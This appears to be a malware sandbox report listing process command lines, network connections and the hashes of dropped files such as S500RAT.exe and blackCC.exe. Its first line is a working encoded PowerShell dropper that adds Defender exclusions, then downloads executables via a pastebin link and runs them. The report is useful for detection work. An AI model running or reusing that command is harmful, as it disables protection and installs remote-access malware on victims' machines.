"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4480 -ip 4480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 152
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:49825 | | tcp |
| N/A | 127.0.0.1:49827 | | tcp |
| N/A | 127.0.0.1:49829 | | tcp |
| N/A | 127.0.0.1:49831 | | tcp |
| N/A | 127.0.0.1:49833 | | tcp |
| N/A | 127.0.0.1:49835 | | tcp |
| N/A | 127.0.0.1:49837 | | tcp |
| N/A | 127.0.0.1:49839 | | tcp |
| N/A | 127.0.0.1:49841 | | tcp |
| N/A | 127.0.0.1:49843 | | tcp |
| N/A | 127.0.0.1:49845 | | tcp |
| N/A | 127.0.0.1:49848 | | tcp |
| N/A | 127.0.0.1:49851 | | tcp |
| N/A | 127.0.0.1:49853 | | tcp |
| N/A | 127.0.0.1:49856 | | tcp |
| N/A | 127.0.0.1:49858 | | tcp |
| N/A | 127.0.0.1:49860 | | tcp |
| N/A | 127.0.0.1:49863 | | tcp |
| N/A | 127.0.0.1:49866 | | tcp |
| N/A | 127.0.0.1:49876 | | tcp |
| N/A | 127.0.0.1:49879 | | tcp |
| N/A | 127.0.0.1:49883 | | tcp |
| N/A | 127.0.0.1:49886 | | tcp |
| N/A | 127.0.0.1:49888 | | tcp |
| N/A | 127.0.0.1:49890 | | tcp |
| N/A | 127.0.0.1:49900 | | tcp |
| N/A | 127.0.0.1:49902 | | tcp |
| N/A | 127.0.0.1:49904 | | tcp |
| N/A | 127.0.0.1:49906 | | tcp |
| N/A | 127.0.0.1:49908 | | tcp |
| N/A | 127.0.0.1:49910 | | tcp |
| N/A | 127.0.0.1:49912 | | tcp |
| N/A | 127.0.0.1:49914 | | tcp |
| N/A | 127.0.0.1:49916 | | tcp |
| N/A | 127.0.0.1:49919 | | tcp |
| N/A | 127.0.0.1:49921 | | tcp |
| N/A | 127.0.0.1:49924 | | tcp |
| N/A | 127.0.0.1:49926 | | tcp |
| N/A | 127.0.0.1:49928 | | tcp |
| N/A | 127.0.0.1:49930 | | tcp |
| N/A | 127.0.0.1:49932 | | tcp |
| N/A | 127.0.0.1:49934 | | tcp |
| N/A | 127.0.0.1:49936 | | tcp |
| N/A | 127.0.0.1:49938 | | tcp |
| N/A | 127.0.0.1:49940 | | tcp |
| N/A | 127.0.0.1:49943 | | tcp |
| N/A | 127.0.0.1:49945 | | tcp |
| N/A | 127.0.0.1:49947 | | tcp |
| N/A | 127.0.0.1:49949 | | tcp |
| N/A | 127.0.0.1:49951 | | tcp |
| N/A | 127.0.0.1:49953 | | tcp |
| N/A | 127.0.0.1:49955 | | tcp |
| N/A | 127.0.0.1:49957 | | tcp |
| N/A | 127.0.0.1:49959 | | tcp |
| N/A | 127.0.0.1:49961 | | tcp |
| N/A | 127.0.0.1:49963 | | tcp |
| N/A | 127.0.0.1:49965 | | tcp |
| N/A | 127.0.0.1:49967 | | tcp |
| N/A | 127.0.0.1:49969 | | tcp |
| N/A | 127.0.0.1:49972 | | tcp |
| N/A | 127.0.0.1:49974 | | tcp |
| N/A | 127.0.0.1:49976 | | tcp |
| N/A | 127.0.0.1:49979 | | tcp |
| N/A | 127.0.0.1:49981 | | tcp |
| N/A | 127.0.0.1:49984 | | tcp |
| N/A | 127.0.0.1:49987 | | tcp |
| N/A | 127.0.0.1:49989 | | tcp |
| N/A | 127.0.0.1:49992 | | tcp |
| N/A | 127.0.0.1:49994 | | tcp |
| N/A | 127.0.0.1:49997 | | tcp |
| N/A | 127.0.0.1:49999 | | tcp |
| N/A | 127.0.0.1:50001 | | tcp |
| N/A | 127.0.0.1:50003 | | tcp |
| N/A | 127.0.0.1:50005 | | tcp |
| N/A | 127.0.0.1:50007 | | tcp |
| N/A | 127.0.0.1:50009 | | tcp |
| N/A | 127.0.0.1:50011 | | tcp |
Files
memory/1276-0-0x0000000000400000-0x0000000000473000-memory.dmp
memory/1276-2-0x0000000000400000-0x0000000000473000-memory.dmp
memory/1276-3-0x0000000000400000-0x0000000000473000-memory.dmp
memory/1276-4-0x0000000002D70000-0x0000000002D77000-memory.dmp
memory/1276-5-0x0000000002F90000-0x0000000003390000-memory.dmp
memory/1276-6-0x0000000002F90000-0x0000000003390000-memory.dmp
memory/1276-7-0x0000000002F90000-0x0000000003390000-memory.dmp
memory/1276-8-0x0000000002F90000-0x0000000003390000-memory.dmp
C:\Users\Admin\w00ieq6n.exe
| MD5 | 93eb0cf0043f1f507a1b94eea7b65fe4 |
| SHA1 | 148be925922c60190bde523cb60a50da9e544da1 |
| SHA256 | 6cbd8961b21b75bb176439538633191ed8364e755c8b2d049ca7281871430d30 |
| SHA512 | 94640f8dfd1ceeb8ec72be3bd40bbafb8b4b8dda584dffcd88c6c616cd65ffb9b0087ed093231db3940211a3b5c3fc8efed957c4e8a701b0a61dfe1c943ccf58 |
memory/1836-26-0x0000000140000000-0x0000000140174000-memory.dmp
memory/5088-36-0x0000000140000000-0x0000000140174000-memory.dmp
memory/4352-38-0x0000000003180000-0x00000000031B6000-memory.dmp
memory/4352-41-0x00000000032D0000-0x00000000032E0000-memory.dmp
C:\Windows\S500RAT.exe
| MD5 | 49dee6e07455a36b45c86864f9718050 |
| SHA1 | 8ec76534e134bbf18904ab9cac30abe228d882d5 |
| SHA256 | 31f004450ed5ebe14d2e9883608278c6d195b9d7d3507239fff455a56b970fd5 |
| SHA512 | c145bd46d59751f1daabcd5a9b5dc6bbb6202894578305e972242103a66bc164dd2bacfbbbfcf958f8da3c15abbd2ce3c0575826faac2345bdf879c7ee7098f7 |
C:\Windows\S500RAT.exe
| MD5 | 7ec8c1c9453c1424f31b0798919d97e1 |
| SHA1 | 847cf1870d5bc69a87d564efff87ba3224f40675 |
| SHA256 | e6e9fc64a8713b03d086be8c200d97b289bae693efe13dd241bc2d754549b7ff |
| SHA512 | eb8dd119c464e42c7957a492364c2fc5a7a576b687c890294b66b03268faabfe2d9f19d1db83fd36c8ea876d33b4cb1e1469649b344f506ca331ae2eb0d5a26f |
memory/1836-37-0x0000000140000000-0x0000000140174000-memory.dmp
C:\Windows\S500RAT.exe
| MD5 | 54d6892ecb4c927c3597e8c6244bd3f2 |
| SHA1 | f07894f47f2a6f4693378e0654331679a6b5460f |
| SHA256 | 2fb2a5b8519f3cc3eb9304206cafab73a5c6b0f8f5d5c5db5e40d3d8ebf2a52a |
| SHA512 | 893f0afd266de5423ae44edd829d0725d5a7aa5f57968123dbc5fc06d07efbfd4d41664730426c3db4a3dc9d3739ad79447283fd4e53654f8b368adb4df3398e |
memory/4352-45-0x00000000059A0000-0x0000000005FCA000-memory.dmp
memory/1276-46-0x0000000000400000-0x0000000000473000-memory.dmp
memory/4352-44-0x0000000073200000-0x00000000739B1000-memory.dmp
memory/1276-48-0x0000000002F90000-0x0000000003390000-memory.dmp
memory/4352-49-0x0000000006000000-0x0000000006022000-memory.dmp
memory/4352-50-0x00000000060A0000-0x0000000006106000-memory.dmp
memory/4352-51-0x0000000006180000-0x00000000061E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fwc5mu0.n5k.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4352-60-0x00000000061F0000-0x0000000006547000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | 9a2abaacb6701339b359620a5b2b72bd |
| SHA1 | a2e1954bda9e76ed6bf969896bc314184dc2923d |
| SHA256 | 88294e2f9c20bf98404059319618855ec4dcae00dc3f9ce35fe29c9e764b66ce |
| SHA512 | 5c848172f87b199b87f1ac02edda6e5038c0e53e13f6aaa501383716947265fdb0c3a6853fe3fc04f58a2188c9736281f4af05d5bb6879f01109cd6ddfcef7d5 |
memory/4352-68-0x0000000006650000-0x000000000666E000-memory.dmp
memory/4352-69-0x0000000006690000-0x00000000066DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | 7e726b2d2ed6fb856138b9042159b0a5 |
| SHA1 | 4963009150221761704c278507be392fe0dc57b0 |
| SHA256 | cd58b31e029fb1c7eb95b7285a170026b13262aa3ce67b410a49aae3ffa041d5 |
| SHA512 | 83cec787774b85e97cc64d608b01e59748c279649fcfa3897bc923df2d10c1e1093591fb25681a3714b728367c323f9fd5368b4649d97b8a461a09e120618b23 |
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | e1d419176a1124a2f71d1520a2b5e734 |
| SHA1 | 5b7271f15130190fb54bba74b2a863b7af3a2e75 |
| SHA256 | 555a87140f6c9ce1863f5f39dcb6990ce8f75f64d583a22cfddf5cc9eca69e0d |
| SHA512 | 18ae072babccff161c665fe7814e54a666778ce6e92053dcb8d5e15a40d1ed2b46d23e8c4a9384e42f1fde7caba2e4d487b0649409da971b675e34c8941d5860 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | dbf35eac1c87ed287c8f7cba33d133b5 |
| SHA1 | d1dbfba561f8112e5099507a18cd9465b4fcb577 |
| SHA256 | 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd |
| SHA512 | c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532 |
memory/2792-79-0x0000000000400000-0x00000000016FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
| MD5 | 462b459a2560b65a657cfecce53d682a |
| SHA1 | f0ce24faf42d2d1453c4f18fda0223b83486e5ae |
| SHA256 | 00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db |
| SHA512 | 5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b |
memory/5052-93-0x0000000000400000-0x00000000015D4000-memory.dmp
memory/1532-94-0x0000000073200000-0x00000000739B1000-memory.dmp
memory/1532-95-0x0000000004850000-0x0000000004860000-memory.dmp
memory/1532-96-0x0000000004850000-0x0000000004860000-memory.dmp
memory/4352-97-0x0000000006C30000-0x0000000006C64000-memory.dmp
memory/4352-98-0x0000000074800000-0x000000007484C000-memory.dmp
memory/4352-109-0x00000000032D0000-0x00000000032E0000-memory.dmp
memory/4352-110-0x00000000032D0000-0x00000000032E0000-memory.dmp
memory/4352-108-0x0000000007870000-0x0000000007914000-memory.dmp
memory/4352-107-0x0000000007840000-0x000000000785E000-memory.dmp
memory/4352-119-0x0000000007FF0000-0x000000000866A000-memory.dmp
memory/4352-120-0x00000000079B0000-0x00000000079CA000-memory.dmp
memory/4352-121-0x0000000007A40000-0x0000000007A4A000-memory.dmp
memory/4352-122-0x0000000007C40000-0x0000000007CD6000-memory.dmp
memory/2952-126-0x0000000000400000-0x0000000000473000-memory.dmp
memory/4352-127-0x0000000007BC0000-0x0000000007BD1000-memory.dmp
memory/4352-129-0x0000000007C00000-0x0000000007C0E000-memory.dmp
memory/4352-130-0x0000000007C10000-0x0000000007C25000-memory.dmp
memory/4352-131-0x0000000007D00000-0x0000000007D1A000-memory.dmp
memory/4352-132-0x0000000007CF0000-0x0000000007CF8000-memory.dmp
memory/1532-134-0x0000000074800000-0x000000007484C000-memory.dmp
memory/1532-143-0x0000000004850000-0x0000000004860000-memory.dmp
memory/1532-133-0x000000007FBE0000-0x000000007FBF0000-memory.dmp
memory/1532-144-0x0000000004850000-0x0000000004860000-memory.dmp
memory/4352-147-0x0000000073200000-0x00000000739B1000-memory.dmp
memory/1532-148-0x00000000072A0000-0x00000000072B1000-memory.dmp
memory/1532-149-0x00000000072D0000-0x00000000072E5000-memory.dmp
memory/2952-152-0x0000000002E70000-0x0000000003270000-memory.dmp
memory/5088-153-0x0000000140000000-0x0000000140174000-memory.dmp
memory/2952-154-0x0000000002E70000-0x0000000003270000-memory.dmp
memory/2952-155-0x0000000000400000-0x0000000000473000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6be52b7449d2aa35cc0ecab9fb7e6f04 |
| SHA1 | 74924360865f819ca322bf0bd77057caa81ecd8d |
| SHA256 | f24a1f580aaa37cab15e60e3de37c3a8e9fbcf54285d9b24efadb0818c2db775 |
| SHA512 | 62820751dfe9c7417dc3306cfdf6a615e9b31d1aaa4267982f4e1fc59e18b4ed78603e240f55d72c97d7520641032299ccdb8f60fe0cecc8c7a539fd780352f3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | d0c46cad6c0778401e21910bd6b56b70 |
| SHA1 | 7be418951ea96326aca445b8dfe449b2bfa0dca6 |
| SHA256 | 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02 |
| SHA512 | 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949 |
memory/1532-159-0x0000000073200000-0x00000000739B1000-memory.dmp